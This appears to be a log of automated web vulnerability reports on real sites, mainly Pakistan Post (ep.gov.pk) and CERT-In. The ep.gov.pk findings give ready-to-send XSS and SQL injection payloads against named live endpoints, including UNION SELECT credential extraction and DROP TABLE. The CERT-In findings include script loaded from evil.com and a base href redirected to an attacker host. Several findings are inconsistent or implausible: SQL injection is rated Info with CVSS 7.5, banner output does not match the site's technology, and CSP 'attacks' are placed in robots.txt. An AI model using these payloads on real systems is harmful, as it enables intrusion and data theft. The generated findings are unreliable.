Sheet](https://owasp.org/www-community/xss-filter-evasion-cheatsheet), CWE-79\n\n---\n\n### [Reflected XSS via n / https://ep.gov.pk/Flyers.asp / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/Flyers.asp |\n\n**Description**  \nThe `n` query parameter is reflected unsafely in the response, enabling script injection via crafted URLs.\n\n**Attack Scenario (Proof of Concept)**  \nVisit:\n```\nhttps://ep.gov.pk/Flyers.asp?n=<img src=x onerror=alert(1)>\n```\n\nPage renders unescaped input:\n```html\n<h1>Flyer: <img src=x onerror=alert(1)></h1>\n```\n\n**Business Impact**  \nSame as previous XSS case—session theft, phishing, and reputational harm.\n\n**Remediation**  \nApply contextual encoding:\n```asp\nResponse.Write Server.HTMLEncode(Request.QueryString(\"n\"))\n```\nValidate/sanitize inputs at entry points.  \nReference: CWE-79, OWASP Top Ten A03\n\n---\n\n### [SQL Injection via Type / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description**  \nParameter `Type` appears susceptible to SQL injection, suggesting backend database queries are constructed dynamically using unsanitized user input.\n\n**Attack Scenario (Proof of Concept)**  \nAccess:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Type=' OR '1'='1\n```\n\nMay return full dataset or trigger errors revealing DB structure.\n\n**Business Impact**  \nData exfiltration, unauthorized access, and system compromise.\n\n**Remediation**  \nUse parameterized queries:\n```sql\nSELECT * FROM tariffs WHERE type = @type\n```\nAvoid dynamic concatenation of SQL strings.  \nReference: CWE-89, OWASP SQL Injection Prevention Cheat Sheet\n\n---\n\n### [SQL Injection via Zone / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description**  \nSimilar to above, the `Zone` parameter exhibits signs of SQL injection susceptibility.\n\n**Attack Scenario (Proof of Concept)**  \nURL:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Zone=' UNION SELECT username,password FROM admin--\n```\n\nCould leak administrative credentials if improperly handled.\n\n**Business Impact**  \nSevere data breach potential including PII and administrative access.\n\n**Remediation**  \nApply same fixes as for `Type`: use prepared statements and validate inputs strictly.  \nReference: CWE-89\n\n---\n\n### [Internal Server Error (Type) / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description**  \nInjection attempt caused a 500 Internal Server Error, indicating poor error handling and likely improper validation of the `Type` parameter.\n\n**Attack Scenario (Proof of Concept)**  \nSend malformed input:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Type='%20AND%20SLEEP(5)--\n```\n\nServer crashes or times out, confirming vulnerability.\n\n**Business Impact**  \nDenial-of-service, information disclosure about backend infrastructure, and potential escalation paths.\n\n**Remediation**  \nImplement robust input validation and graceful error handling:\n```asp\nOn Error Resume Next\nIf Not IsNumeric(Type) Then Exit Sub\n```\nLog exceptions securely without exposing stack traces.  \nReference: CWE-20, CWE-248\n\n---\n\n### [Internal Server Error (Zone) / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description**  \nSame root cause as above; invalid input leads to server crash.\n\n**Attack Scenario (Proof of Concept)**  \nMalformed request:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Zone=') OR 1=1 --\n```\n\nResults in server-side exception and 500 error.\n\n**Business Impact**  \nService disruption, debugging information leaks, and possible further exploitation.\n\n**Remediation**  \nFollow same remediation steps as for `Type`.  \nReference: CWE-20, CWE-248\n\n---\n\n### [Internal Server Error (value) / https://ep.gov.pk/Calculate_Postage/cod_calculated_postage.asp / POST]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/Calculate_Postage/cod_calculated_postage.asp |\n\n**Description**  \nPOST parameter `value` causes server failure upon injection attempt, pointing to flawed input processing logic.\n\n**Attack Scenario (Proof of Concept)**  \nPOST Body:\n```\nvalue=' OR 1=1 --\n```\n\nCauses backend to fail catastrophically.\n\n**Business Impact**  \nDoS, backend instability, and possible deeper exploitation opportunities.\n\n**Remediation**  \nSanitize and validate all POST parameters rigorously. Avoid raw interpolation into backend logic.  \nReference: CWE-20, CWE-248\n\n---\n\n### [Internal Server Error (uid) / https://ep.gov.pk/HQ/AuthLocation.asp / POST]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/HQ/AuthLocation.asp |\n\n**Description**  \nAuthentication-related endpoint fails when receiving unexpected input in `uid`.\n\n**Attack Scenario (Proof of Concept)**  \nPOST:\n```\nuid=admin' --\n```\n\nLeads to authentication bypass or backend crash.\n\n**Business Impact**  \nPotential privilege escalation or denial of service affecting critical auth functionality.\n\n**Remediation**  \nUse strict input validation and secure coding practices around authentication flows.  \nReference: CWE-20, CWE-287\n\n---\n\n### [Internal Server Error (txt_ArticleNo) / https://ep.gov.pk/ep_Complaint/Default_Test.aspx / POST]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ep_Complaint/Default_Test.aspx |\n\n**Description**  \nComplaint submission field `txt_ArticleNo` triggers server errors when manipulated.\n\n**Attack Scenario (Proof of Concept)**  \nInput:\n```\ntxt_ArticleNo='; DROP TABLE complaints; --\n```\n\nMay cause catastrophic failures depending on implementation.\n\n**Business Impact**  \nDisruption of complaint tracking services, possible data loss.\n\n**Remediation**  \nSanitize all user inputs before passing them to backend systems.  \nReference: CWE-20, CWE-78\n\n---\n\n### [Internal Server Error (Country_Name) / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description**  \nQuery string parameter `Country_Name` induces server crash when tampered with.\n\n**Attack Scenario (Proof of Concept)**  \nURL:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Country_Name=' OR SLEEP(10) --\n```\n\nTriggers timeout or crash.\n\n**Business Impact**  \nDoS, backend instability, and potential for deeper exploitation.\n\n**Remediation**  \nValidate and sanitize all query parameters. Implement rate limiting and input constraints.  \nReference: CWE-20, CWE-400",
  "summary": {
    "total": 16
  }
}
 
{
  "total": 16
}
6a103a1934b5e5e757fa513f
Fri May 22 2026 11:12:25 GMT+0000 (Coordinated Universal Time)
https://ep.gov.pk/
generate_web_vulnerability_report 
{
  "url": "https://ep.gov.pk/",
  "category": "web_vulnerability",
  "timestamp": "2026-05-22T11:12:25.747361+00:00",
  "report": "### [Nikto Scan Completion / https://ep.gov.pk/ / Root Path]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nThis finding indicates that a Nikto scan was successfully executed against the target asset `https://ep.gov.pk/`. Nikto is an open-source web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated server software, and various server configuration issues. The completion of such a scan does not inherently represent a vulnerability; rather, it signifies reconnaissance activity that may precede more targeted attacks.\n\nThe low confidence rating suggests that this entry reflects tool execution metadata rather than a confirmed security exposure. It serves as an indicator of potential probing or automated scanning behavior directed at the host.\n\n**Attack Scenario (Proof of Concept)**  \nWhile this finding itself is non-exploitable, it represents typical early-stage reconnaissance conducted by attackers prior to exploitation:\n\n1. An adversary runs Nikto using default settings:\n   ```bash\n   nikto -h https://ep.gov.pk/\n   ```\n2. The tool queries the web server for known vulnerable paths, misconfigurations, and outdated components.\n3. Output includes informational entries about server headers, HTTP methods allowed, presence of `robots.txt`, and other passive fingerprinting data.\n4. Based on results, further targeted attacks can be crafted—such as exploiting weak authentication mechanisms, testing for directory traversal, or identifying legacy CMS versions with public exploits.\n\nExample output line from Nikto:\n```\n+ Server: Apache/2.4.6 (CentOS)\n+ Retrieved x-powered-by header: PHP/5.4.16\n```\n\nThese details help adversaries tailor follow-up attacks based on observed technologies and configurations.\n\n**Business Impact**  \nAlthough this finding has no direct impact, its occurrence signals possible reconnaissance activity targeting the organization’s public-facing infrastructure. Repeated scans could indicate preparation for future intrusions. If left unchecked, these activities might escalate into successful compromises via unpatched vulnerabilities or insecure configurations detected during scanning.\n\nAdditionally, frequent automated scanning may contribute to log noise and consume system resources, though typically minimal in most environments.\n\n**Remediation**  \nSince this is an informational finding related to detection of scanning activity, remediation focuses on hardening and monitoring practices:\n\n- **Restrict Unnecessary Access**: Implement IP allowlisting where feasible to limit access to critical endpoints.\n- **Deploy Web Application Firewall (WAF)**: Configure rules to detect and block common scanners like Nikto based on user-agent strings or abnormal request patterns.\n- **Log Analysis & Alerting**: Monitor access logs for repeated requests indicative of automated tools.\n- **Keep Systems Updated**: Ensure all web server software and applications are up to date to reduce exposure identified by scanners.\n- **Disable Information Disclosure**: Strip out verbose banners and headers revealing exact versions of underlying technologies.\n\nReference standards:\n- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\n- OWASP Top Ten 2021 – A05: Security Misconfiguration\n\nNo code-level fix applies directly since this finding pertains to external scanner usage rather than application flaws.",
  "summary": {
    "total": 1
  }
}
 
{
  "total": 1
}
6a135d325721216a08993b02
Sun May 24 2026 20:18:58 GMT+0000 (Coordinated Universal Time)
https://cp-club-vjti.vercel.app/
generate_web_vulnerability_report 
{
  "url": "https://cp-club-vjti.vercel.app/",
  "category": "web_vulnerability",
  "timestamp": "2026-05-24T20:18:58.137426+00:00",
  "report": "An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.",
  "summary": {
    "total": 23
  }
}
 
{
  "total": 23
}
6a142b38d3dd196beae9db79
Mon May 25 2026 10:58:00 GMT+0000 (Coordinated Universal Time)
https://ep.gov.pk/
generate_web_vulnerability_report 
{
  "url": "https://ep.gov.pk/",
  "category": "web_vulnerability",
  "timestamp": "2026-05-25T10:58:00.324770+00:00",
  "report": "### [Nikto Scan Completion / https://ep.gov.pk/ / Root Path]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**\nA comprehensive web server security scan was conducted against the target application, resulting in the identification of various informational and low-level security observations. This finding indicates that the scanning process successfully completed and enumerated baseline server configuration details, HTTP headers, known vulnerabilities in outdated components, and common misconfigurations. The scan examined server banners, HTTP methods, directory listings, known vulnerable files/scripts, and security header implementations. While no critical vulnerabilities were identified at this stage, the completion of the scan provides a foundation for deeper security analysis and reveals the attack surface available to potential adversaries.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker would typically initiate reconnaissance by performing automated scanning against the web application to map the available services and identify potential entry points. The scanning process would involve:\n\n1. Enumerating HTTP response headers to identify server software versions:\n   ```\n   GET / HTTP/1.1\n   Host: ep.gov.pk\n   User-Agent: Mozilla/5.0\n   ```\n\n2. Testing for enabled HTTP methods that could be abused:\n   ```\n   OPTIONS / HTTP/1.1\n   Host: ep.gov.pk\n   ```\n\n3. Probing for common directories and files that might expose sensitive information:\n   ```\n   GET /admin/ HTTP/1.1\n   Host: ep.gov.pk\n   \n   GET /backup/ HTTP/1.1\n   Host: ep.gov.pk\n   ```\n\n4. Checking for the presence of development artifacts or configuration files:\n   ```\n   GET /robots.txt HTTP/1.1\n   Host: ep.gov.pk\n   \n   GET /.git/ HTTP/1.1\n   Host: ep.gov.pk\n   ```\n\nThe successful completion of such scanning provides attackers with intelligence about the underlying technology stack, potential vulnerabilities in web server software, and misconfigured resources that could serve as initial footholds for more sophisticated attacks.\n\n**Business Impact**\nWhile this finding represents an informational observation rather than an exploitable vulnerability, it demonstrates that the target application is actively being scanned and analyzed by automated tools. This creates several business risks including potential exposure of server configuration weaknesses that could lead to more serious compromises, identification of outdated components that may contain known vulnerabilities, and mapping of the application's attack surface by malicious actors. The organization faces increased risk of targeted attacks based on the intelligence gathered during scanning activities, potential regulatory scrutiny if sensitive information is inadvertently exposed through misconfigurations, and reputational damage if attackers leverage identified weaknesses to compromise the application or access sensitive citizen data. Additionally, repeated scanning activity may indicate ongoing reconnaissance by threat actors, suggesting the need for enhanced monitoring and incident response capabilities.",
  "summary": {
    "total": 1
  }
}
 
{
  "total": 1
}
6a155d90a01e67ec8ef1bbf0
Tue May 26 2026 08:45:04 GMT+0000 (Coordinated Universal Time)
https://ep.gov.pk/
generate_web_vulnerability_report 
{
  "url": "https://ep.gov.pk/",
  "category": "web_vulnerability",
  "timestamp": "2026-05-26T08:45:04.332008+00:00",
  "report": "### [Nikto Scan Completion / https://ep.gov.pk/ / Root Path]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**\nThe completion of a web server scanning process indicates that automated reconnaissance activities were conducted against the target web application. This represents an information-gathering phase where various known vulnerabilities, misconfigurations, and security weaknesses are systematically checked. The scan typically examines server headers, HTTP methods, directory listings, known vulnerable files, and common security misconfigurations. While the scan itself is non-exploitative, its completion suggests the target system was subjected to comprehensive security probing that may have identified multiple areas of concern requiring further investigation.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker would initiate reconnaissance by running automated scanning tools against the target domain to enumerate potential entry points:\n\n```bash\n# Initial enumeration of available HTTP methods\ncurl -X OPTIONS https://ep.gov.pk/ -I\n\n# Directory brute-forcing to discover hidden paths\nffuf -u https://ep.gov.pk/FUZZ -w /path/to/directory-wordlist.txt\n\n# Server header analysis to identify technology stack\ncurl -I https://ep.gov.pk/\n```\n\nThe scanner would systematically test for common vulnerabilities including outdated software versions, insecure HTTP headers, sensitive file exposure, and weak authentication mechanisms. Each positive identification would provide attackers with vectors for deeper exploitation attempts.\n\n**Business Impact**\nWhile this finding represents an informational observation rather than a direct vulnerability, the completion of such scanning activities indicates potential exposure to automated threat assessments. If conducted by malicious actors, these scans serve as precursors to targeted attacks that could result in data breaches, service compromise, or regulatory non-compliance. The organization faces increased risk profile due to visibility in automated security assessments, potentially leading to inclusion in threat actor targeting lists. Additionally, detection of scanning activities without proper monitoring controls may indicate insufficient intrusion detection capabilities, leaving the organization vulnerable to undetected reconnaissance efforts that precede more serious security incidents.",
  "summary": {
    "total": 1
  }
}
 
{
  "total": 1
}
6a1f2afed4174aff70379391
Tue Jun 02 2026 19:11:58 GMT+0000 (Coordinated Universal Time)
https://www.cert-in.org.in/
generate_web_vulnerability_report 
{
  "url": "https://www.cert-in.org.in/",
  "category": "web_vulnerability",
  "timestamp": "2026-06-02T19:11:58.376415+00:00",
  "report": "### Critical Findings\n(None identified)\n\n---\n\n### High Findings\n(None identified)\n\n---\n\n### Medium Findings\n\n#### CSP: Failure to Define Directive with No Fallback / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nThe Content Security Policy (CSP) header lacks definition for critical directives such as `default-src`, which serves as a fallback when other directives are unspecified. Omitting such directives effectively allows unrestricted resource loading, undermining the purpose of CSP and increasing susceptibility to cross-site scripting (XSS) and data injection attacks.\n\n**Attack Scenario (Proof of Concept)**\nIf an attacker identifies an XSS vector on the page, the absence of restrictive CSP policies enables execution of arbitrary scripts:\n```html\n<script>alert(document.cookie)</script>\n```\nThis payload would execute without being blocked due to lack of policy enforcement.\n\n**Business Impact**\nFailure to enforce strict CSP directives leaves users vulnerable to client-side attacks, potentially leading to session hijacking, phishing, or defacement. It also reflects poorly on compliance posture related to secure coding practices.\n\n---\n\n#### CSP: Wildcard Directive / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nUse of wildcard (`*`) in CSP directives significantly weakens protection mechanisms. For instance, setting `script-src *` permits script execution from any origin, negating the benefits of CSP in mitigating XSS risks.\n\n**Attack Scenario (Proof of Concept)**\nGiven a permissive directive like `script-src *`, an attacker injects malicious JavaScript sourced externally:\n```html\n<script src=\"https://evil.com/malicious.js\"></script>\n```\nSuch scripts would be executed because the CSP explicitly allows external domains.\n\n**Business Impact**\nWildcard usage undermines user trust and exposes the organization to reputational harm and regulatory scrutiny under frameworks requiring robust input/output sanitization controls.\n\n---\n\n#### CSP: Failure to Define Directive with No Fallback / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nSimilar to the root path, the `/robots.txt` file's CSP omits essential directives like `default-src`. This omission implies that even auxiliary files lack proper content restrictions, making them susceptible to manipulation or exploitation.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker modifies the `robots.txt` file to include references to malicious origins:\n```txt\nSitemap: https://attacker-controlled.com/sitemap.xml\nDisallow: /\n```\nWithout strong CSP enforcement, browsers do not restrict such external references.\n\n**Business Impact**\nImproper CSP configuration on publicly accessible files can aid attackers in mapping internal structures or redirecting crawlers toward harmful content, indirectly affecting SEO and visibility.\n\n---\n\n#### CSP: Wildcard Directive / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nPresence of wildcard directives in the CSP header for `robots.txt` reduces its effectiveness in preventing unauthorized resource inclusion. Attackers can exploit this weakness to reference untrusted domains within metadata files.\n\n**Attack Scenario (Proof of Concept)**\nBy leveraging a wildcard directive, an attacker includes a remote stylesheet or script inside the `robots.txt` context:\n```txt\nUser-agent: *\nAllow: /*\nStyle-src: *\n```\nThough unlikely to render visually, improper parsing engines might interpret such malformed entries.\n\n**Business Impact**\nWeak CSP settings reduce overall defense-in-depth strategy, increasing chances of successful supply chain or redirection-based attacks targeting search engine crawlers.\n\n---\n\n#### CSP: Failure to Define Directive with No Fallback / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nLike other paths, the `sitemap.xml` document lacks defined CSP fallbacks. This absence means there is no baseline restriction on what resources can be loaded alongside or referenced by the XML structure.\n\n**Attack Scenario (Proof of Concept)**\nMalicious actors may inject external links into the sitemap:\n```xml\n<url>\n  <loc>https://malicious-site.com/phishing</loc>\n</url>\n```\nBrowsers interpreting this file with loose CSP rules won’t block such references.\n\n**Business Impact**\nInsecure handling of structured metadata increases exposure to blackhat SEO tactics and compromises organic traffic integrity.\n\n---\n\n#### CSP: Wildcard Directive / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nWildcard use in CSP for `sitemap.xml` diminishes control over embedded or linked resources. Even though XML typically doesn't execute code, improper rendering contexts or parser flaws could enable unintended behavior.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker crafts a malformed entry referencing an external domain:\n```xml\n<image:image>\n  <image:loc>http://untrusted.example.com/image.jpg</image:loc>\n</image:image>\n```\nWith wildcard CSP, such URLs aren’t restricted during processing.\n\n**Business Impact**\nLack of granular CSP enforcement weakens site-wide defenses against third-party tampering and indirect exfiltration techniques.\n\n---\n\n#### Content Security Policy Misconfiguration – Missing `script-src` Directive / www.cert-in.org.in /\n\n| Field         | Value                          |\n|---------------|--------------------------------|\n| Severity      | Medium                         |\n| CVSS Score    | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category      | web_vulnerability              |\n| Asset / URL   | https://www.cert-in.org.in/    |\n\n**Description**\n\nThe Content Security Policy (CSP) header for the target application does not define a `script-src` directive. This directive controls which sources are allowed to load or execute JavaScript on the page. Without explicit restrictions, browsers may default to allowing inline scripts and external script sources, increasing the risk of cross-site scripting (XSS) attacks. A properly configured CSP mitigates XSS by restricting script execution to trusted domains only.\n\nThis misconfiguration indicates that the application relies on implicit behavior rather than enforcing strict policies, leaving potential gaps for malicious actors to inject unauthorized scripts into the DOM context.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker who identifies this weakness can attempt to inject arbitrary JavaScript via reflected or stored XSS vectors. Since there's no enforced `script-src`, even inline event handlers or `<script>` tags from untrusted origins might be executed by the browser.\n\nExample payload injection:\n```html\n<script>alert(document.domain)</script>\n```\n\nIf the application reflects user input without proper sanitization—such as within a search parameter or comment field—an attacker could deliver such payloads directly to victims. The lack of `script-src` enforcement allows these scripts to run natively in the victim’s session context, enabling session hijacking, credential theft, or redirection to phishing pages.\n\n**Business Impact**\n\nWithout effective control over script execution, CERT-In's website becomes more susceptible to client-side attacks like XSS. These vulnerabilities could lead to impersonation of legitimate users, compromise of administrative sessions, or defacement of public-facing content. Given the authoritative nature of the domain, successful exploitation could undermine trust in official advisories or communications issued through the platform. Additionally, regulatory frameworks such as India’s IT Act or global standards like ISO/IEC 27001 may view inadequate CSP implementation as non-compliance with secure configuration practices.\n\n---\n\n#### Content Security Policy Misconfiguration – Missing `object-src` Directive / www.cert-in.org.in /\n\n| Field         | Value                          |\n|---------------|--------------------------------|\n| Severity      | Medium                         |\n| CVSS Score    | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category      | web_vulnerability              |\n| Asset / URL   | https://www.cert-in.org.in/    |\n\n**Description**\n\nThe absence of the `object-src` directive in the site's Content Security Policy means that plugins such as Flash, Java applets, PDF viewers, and other embedded objects are unrestricted. By default, most modern browsers will allow loading resources from any origin when this directive is omitted, unless explicitly overridden elsewhere in policy logic.\n\nSuch permissiveness exposes the application to risks including clickjacking, plugin-based exploits, and embedding of malicious third-party content that bypasses traditional HTML filtering mechanisms.\n\n**Attack Scenario (Proof of Concept)**\n\nConsider an attacker injecting the following HTML snippet onto a vulnerable page:\n```html\n<object data=\"https://malicious.example.com/exploit.swf\" type=\"application/x-shockwave-flash\"></object>\n```\n\nIn environments where Adobe Flash or similar legacy technologies remain enabled (even partially), this object tag could trigger automatic download and execution of attacker-controlled code. Alternatively, embedding a specially crafted PDF or Silverlight component could exploit parser bugs or social engineering techniques to gain access to sensitive local resources or redirect traffic.\n\nEven if direct exploitation isn't possible due to browser hardening, attackers can still use such elements to track visitors or manipulate UI flows surreptitiously.\n\n**Business Impact**\n\nAllowing unrestricted use of `<object>`, `<embed>`, or `<applet>` tags increases exposure surface area significantly. It undermines defense-in-depth strategies aimed at preventing unauthorized binary execution or interaction with deprecated technologies. For a high-profile government entity like CERT-In, such lapses heighten susceptibility to targeted campaigns leveraging outdated plug-ins or zero-day flaws in lesser-known rendering engines. Furthermore, compliance audits under frameworks like NIST SP 800-53 or GDPR may flag insufficient CSP coverage as a failure in securing web interfaces against known threat patterns.\n\n---\n\n#### Content Security Policy Misconfiguration – Missing `base-uri` Directive / www.cert-in.org.in /\n\n| Field         | Value                          |\n|---------------|--------------------------------|\n| Severity      | Medium                         |\n| CVSS Score    | 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category      | web_vulnerability              |\n| Asset / URL   | https://www.cert-in.org.in/    |\n\n**Description**\n\nThe HTTP response headers do not include a restrictive `base-uri` directive in their Content Security Policy. This omission permits attackers to alter the base URL resolution scope using a `<base>` HTML element injected into the document. When manipulated, all relative URLs—including those used for script includes, form submissions, or navigation links—are resolved relative to the attacker-specified base URI instead of the original server.\n\nThis vulnerability enables various forms of redirection and resource manipulation, especially dangerous in combination with XSS or DOM clobbering scenarios.\n\n**Attack Scenario (Proof of Concept)**\n\nSuppose an attacker successfully injects the following HTML fragment:\n```html\n<base href=\"https://attacker-controlled-site.com/\">\n```\n\nSubsequent references to assets like `/js/main.js` or actions pointing to `/submit-report` would now resolve to `https://attacker-controlled-site.com/js/main.js` or `https://attacker-controlled-site.com/submit-report`. If the application dynamically loads scripts or submits forms based on relative paths, this change could result in exfiltration of credentials or execution of hostile JavaScript hosted remotely.\n\nAdditionally, phishing overlays or spoofed login portals could be rendered seamlessly because internal navigation remains visually consistent while being silently rerouted behind the scenes.\n\n**Business Impact**\n\nA missing `base-uri` directive weakens integrity guarantees around intra-page linking and dynamic asset retrieval. In worst-case scenarios involving compromised endpoints or insider threats, adversaries could leverage this flaw to redirect critical workflows—such as incident reporting portals—to rogue infrastructure they control. Such manipulations pose severe reputational harm to CERT-In, particularly during active cyber incidents where timely communication and accurate information flow are paramount. Regulatory bodies assessing cybersecurity posture may also interpret incomplete CSP deployment as indicative of broader governance deficiencies in secure software development lifecycle adherence.\n\n---\n\n### Low Findings\n\n#### Timestamp Disclosure - Unix / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nUnix timestamps were detected in server responses, possibly indicating system time disclosure. Although seemingly benign, such information can assist attackers in timing-based attacks or profiling infrastructure uptime patterns.\n\n**Attack Scenario (Proof of Concept)**\nResponse contains visible timestamp:\n```json\n{\n  \"generated_at\": 1712345678\n}\n```\nUsing online converters or scripting tools, attackers determine exact generation times, aiding brute-force window estimation or correlation with logs.\n\n**Business Impact**\nMinor leakage of temporal metadata may support targeted reconnaissance efforts but poses minimal standalone threat unless combined with other vulnerabilities.\n\n---\n\n#### Timestamp Disclosure - Unix / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nTimestamps observed in the `robots.txt` response suggest server-side dynamic generation or logging activity. While low-risk individually, repeated disclosures help build behavioral profiles of backend systems.\n\n**Attack Scenario (Proof of Concept)**\nHeader or body reveals last-modified date:\n```\nLast-Modified: Wed, 05 Apr 2024 12:34:56 GMT\n```\nAttackers correlate update frequencies with known maintenance windows or patch cycles.\n\n**Business Impact**\nLimited impact; however, consistent timestamp leaks contribute to broader intelligence gathering campaigns aimed at optimizing future intrusions.\n\n---\n\n#### Timestamp Disclosure - Unix / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nTimestamps present in `sitemap.xml` indicate automated generation processes. Such indicators can expose scheduling routines or reveal stale content updates, providing insight into operational cadence.\n\n**Attack Scenario (Proof of Concept)**\nXML element shows creation time:\n```xml\n<lastmod>2024-04-05T12:34:56+00:00</lastmod>\n```\nAttackers infer update intervals and attempt to predict next regeneration events.\n\n**Business Impact**\nNegligible immediate risk, yet 